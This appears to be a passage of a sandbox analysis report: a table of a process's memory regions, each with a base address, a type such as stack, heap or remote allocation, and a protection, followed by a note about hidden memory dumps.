page read and write
|
||
|
123E000
|
stack
|
page read and write
|
||
|
7C4D000
|
stack
|
page read and write
|
||
|
2D6C000
|
trusted library allocation
|
page read and write
|
||
|
5250000
|
trusted library allocation
|
page read and write
|
||
|
7D82000
|
trusted library allocation
|
page read and write
|
||
|
1232000
|
trusted library allocation
|
page read and write
|
||
|
51FA000
|
trusted library allocation
|
page read and write
|
||
|
648E000
|
heap
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
2DA8000
|
trusted library allocation
|
page read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
55D0000
|
trusted library allocation
|
page read and write
|
||
|
5201000
|
trusted library allocation
|
page read and write
|
||
|
5790000
|
trusted library allocation
|
page read and write
|
||
|
2B4E000
|
stack
|
page read and write
|
||
|
65C6000
|
trusted library allocation
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
2F1D000
|
trusted library allocation
|
page read and write
|
||
|
5CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
12A2000
|
trusted library allocation
|
page read and write
|
||
|
2AC0000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
1386000
|
trusted library allocation
|
page read and write
|
||
|
13D1000
|
trusted library allocation
|
page read and write
|
||
|
761E000
|
stack
|
page read and write
|
||
|
655A000
|
trusted library allocation
|
page read and write
|
||
|
655B000
|
trusted library allocation
|
page read and write
|
||
|
5640000
|
trusted library allocation
|
page read and write
|
||
|
6BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
615E000
|
stack
|
page read and write
|
||
|
64BF000
|
heap
|
page read and write
|
||
|
2F99000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
trusted library allocation
|
page read and write
|
||
|
2B00000
|
trusted library allocation
|
page read and write
|
||
|
11E0000
|
heap
|
page read and write
|
||
|
605E000
|
stack
|
page read and write
|
||
|
127D000
|
trusted library allocation
|
page execute and read and write
|
||
|
135E000
|
stack
|
page read and write
|
||
|
7B8E000
|
stack
|
page read and write
|
||
|
5640000
|
trusted library allocation
|
page read and write
|
||
|
53A3000
|
heap
|
page read and write
|
||
|
1220000
|
trusted library allocation
|
page read and write
|
||
|
1270000
|
heap
|
page read and write
|
||
|
30F2000
|
trusted library allocation
|
page read and write
|
||
|
40F1000
|
trusted library allocation
|
page read and write
|
||
|
5836000
|
trusted library allocation
|
page read and write
|
||
|
41A000
|
remote allocation
|
page execute and read and write
|
||
|
2BF1000
|
trusted library allocation
|
page read and write
|
||
|
2E93000
|
trusted library allocation
|
page read and write
|
||
|
1292000
|
trusted library allocation
|
page read and write
|
||
|
F10000
|
heap
|
page read and write
|
||
|
14EA000
|
heap
|
page read and write
|
||
|
2DEC000
|
trusted library allocation
|
page read and write
|
||
|
5220000
|
trusted library allocation
|
page execute and read and write
|
||
|
1237000
|
trusted library allocation
|
page execute and read and write
|
||
|
40D000
|
remote allocation
|
page execute and read and write
|
||
|
7853000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page execute and read and write
|
||
|
3109000
|
trusted library allocation
|
page read and write
|
||
|
5700000
|
trusted library allocation
|
page read and write
|
||
|
2DE7000
|
trusted library allocation
|
page read and write
|
||
|
2DD7000
|
trusted library allocation
|
page read and write
|
||
|
51FE000
|
trusted library allocation
|
page read and write
|
||
|
402000
|
remote allocation
|
page execute and read and write
|
||
|
12B0000
|
heap
|
page read and write
|
||
|
3D4B000
|
trusted library allocation
|
page read and write
|
||
|
2CBF000
|
stack
|
page read and write
|
||
|
2E24000
|
trusted library allocation
|
page read and write
|
||
|
5830000
|
trusted library allocation
|
page read and write
|
||
|
12A7000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E54000
|
trusted library allocation
|
page read and write
|
||
|
2D59000
|
trusted library allocation
|
page read and write
|
||
|
7B9000
|
stack
|
page read and write
|
||
|
13D6000
|
trusted library allocation
|
page read and write
|
||
|
BD7000
|
stack
|
page read and write
|
||
|
649D000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
78DE000
|
stack
|
page read and write
|
||
|
52AD000
|
stack
|
page read and write
|
||
|
6497000
|
heap
|
page read and write
|
||
|
53A0000
|
heap
|
page read and write
|
||
|
2DC9000
|
trusted library allocation
|
page read and write
|
||
|
2F06000
|
trusted library allocation
|
page read and write
|
||
|
12A0000
|
heap
|
page read and write
|
||
|
856D000
|
stack
|
page read and write
|
||
|
1408000
|
heap
|
page read and write
|
||
|
5950000
|
trusted library allocation
|
page read and write
|
||
|
128D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AE5000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D54000
|
trusted library allocation
|
page read and write
|
||
|
1360000
|
trusted library allocation
|
page execute and read and write
|
||
|
6170000
|
heap
|
page read and write
|
||
|
2E20000
|
trusted library allocation
|
page read and write
|
||
|
5792000
|
trusted library allocation
|
page read and write
|
||
|
6160000
|
heap
|
page read and write
|
||
|
1001000
|
heap
|
page read and write
|
||
|
AC9000
|
stack
|
page read and write
|
||
|
2E81000
|
trusted library allocation
|
page read and write
|
||
|
30F1000
|
trusted library allocation
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
10FF000
|
stack
|
page read and write
|
||
|
52BD000
|
stack
|
page read and write
|
||
|
1240000
|
heap
|
page read and write
|
||
|
1260000
|
trusted library allocation
|
page execute and read and write
|
||
|
55C5000
|
trusted library allocation
|
page read and write
|
||
|
6BF0000
|
heap
|
page read and write
|
||
|
B00000
|
heap
|
page read and write
|
||
|
2F18000
|
trusted library allocation
|
page read and write
|
||
|
1280000
|
trusted library allocation
|
page read and write
|
||
|
FB0000
|
trusted library allocation
|
page read and write
|
||
|
592E000
|
stack
|
page read and write
|
||
|
FE8000
|
heap
|
page read and write
|
||
|
58AC000
|
stack
|
page read and write
|
||
|
5CC4000
|
trusted library allocation
|
page read and write
|
||
|
1400000
|
trusted library allocation
|
page read and write
|
||
|
13F5000
|
trusted library allocation
|
page read and write
|
||
|
BC7000
|
stack
|
page read and write
|
||
|
2F9D000
|
trusted library allocation
|
page read and write
|
||
|
5642000
|
trusted library allocation
|
page read and write
|
||
|
BEFB000
|
stack
|
page read and write
|
||
|
51EE000
|
trusted library allocation
|
page read and write
|
||
|
726E000
|
heap
|
page read and write
|
||
|
1203000
|
trusted library allocation
|
page execute and read and write
|
||
|
FDB000
|
heap
|
page read and write
|
||
|
13A4000
|
trusted library allocation
|
page read and write
|
||
|
3D14000
|
trusted library allocation
|
page read and write
|
||
|
5BE0000
|
trusted library allocation
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
1290000
|
heap
|
page read and write
|
||
|
5BF0000
|
heap
|
page read and write
|
||
|
77D000
|
stack
|
page read and write
|
||
|
13F0000
|
trusted library allocation
|
page read and write
|
||
|
6590000
|
trusted library allocation
|
page read and write
|
||
|
3D1D000
|
trusted library allocation
|
page read and write
|
||
|
6450000
|
heap
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
5820000
|
trusted library allocation
|
page read and write
|
||
|
FC0000
|
heap
|
page read and write
|
||
|
681D000
|
stack
|
page read and write
|
||
|
5794000
|
trusted library allocation
|
page read and write
|
||
|
3F45000
|
trusted library allocation
|
page read and write
|
||
|
53F3000
|
heap
|
page read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
12AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
73C2000
|
heap
|
page read and write
|
||
|
7862000
|
heap
|
page read and write
|
||
|
2B8E000
|
stack
|
page read and write
|
||
|
569F000
|
stack
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
644E000
|
stack
|
page read and write
|
||
|
658D000
|
trusted library allocation
|
page read and write
|
||
|
65D0000
|
trusted library allocation
|
page read and write
|
||
|
2BFD000
|
trusted library allocation
|
page read and write
|
||
|
5596000
|
trusted library allocation
|
page read and write
|
||
|
2E0D000
|
trusted library allocation
|
page read and write
|
||
|
6570000
|
trusted library allocation
|
page read and write
|
||
|
1410000
|
heap
|
page read and write
|
||
|
5250000
|
trusted library allocation
|
page read and write
|
||
|
13A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
6BB0000
|
trusted library allocation
|
page read and write
|
||
|
15FF000
|
stack
|
page read and write
|
||
|
BFFC000
|
stack
|
page read and write
|
||
|
6690000
|
heap
|
page read and write
|
||
|
6E7F000
|
stack
|
page read and write
|
||
|
2E5E000
|
trusted library allocation
|
page read and write
|
||
|
5C80000
|
trusted library allocation
|
page read and write
|
||
|
7A4E000
|
stack
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
5290000
|
trusted library section
|
page readonly
|
||
|
5850000
|
heap
|
page execute and read and write
|
||
|
2AE2000
|
trusted library allocation
|
page read and write
|
||
|
1270000
|
trusted library allocation
|
page read and write
|
||
|
5570000
|
trusted library allocation
|
page read and write
|
||
|
109F000
|
heap
|
page read and write
|
||
|
FA0000
|
trusted library allocation
|
page read and write
|
||
|
2E16000
|
trusted library allocation
|
page read and write
|
||
|
6584000
|
trusted library allocation
|
page read and write
|
||
|
2BEE000
|
trusted library allocation
|
page read and write
|
||
|
1054000
|
heap
|
page read and write
|
||
|
5217000
|
trusted library allocation
|
page read and write
|
||
|
2E01000
|
trusted library allocation
|
page read and write
|
||
|
129A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7386000
|
heap
|
page read and write
|
||
|
2AEB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DD9000
|
trusted library allocation
|
page read and write
|
||
|
6C00000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F0E000
|
stack
|
page read and write
|
||
|
6556000
|
trusted library allocation
|
page read and write
|
||
|
6C40000
|
heap
|
page read and write
|
||
|
53F0000
|
heap
|
page read and write
|
||
|
7D4E000
|
stack
|
page read and write
|
||
|
65A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5710000
|
heap
|
page read and write
|
||
|
65E0000
|
trusted library allocation
|
page read and write
|
||
|
2BC0000
|
heap
|
page execute and read and write
|
||
|
5713000
|
heap
|
page read and write
|
||
|
72D7000
|
heap
|
page read and write
|
||
|
2C10000
|
trusted library allocation
|
page read and write
|
||
|
771E000
|
stack
|
page read and write
|
||
|
1260000
|
trusted library allocation
|
page read and write
|
||
|
13DD000
|
trusted library allocation
|
page read and write
|
||
|
647E000
|
stack
|
page read and write
|
||
|
3E43000
|
trusted library allocation
|
page read and write
|
||
|
3FFB000
|
trusted library allocation
|
page read and write
|
||
|
9DE000
|
stack
|
page read and write
|
||
|
2FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DDE000
|
trusted library allocation
|
page read and write
|
||
|
2B8E000
|
stack
|
page read and write
|
||
|
116E000
|
stack
|
page read and write
|
There are 567 hidden memdumps, click here to show them.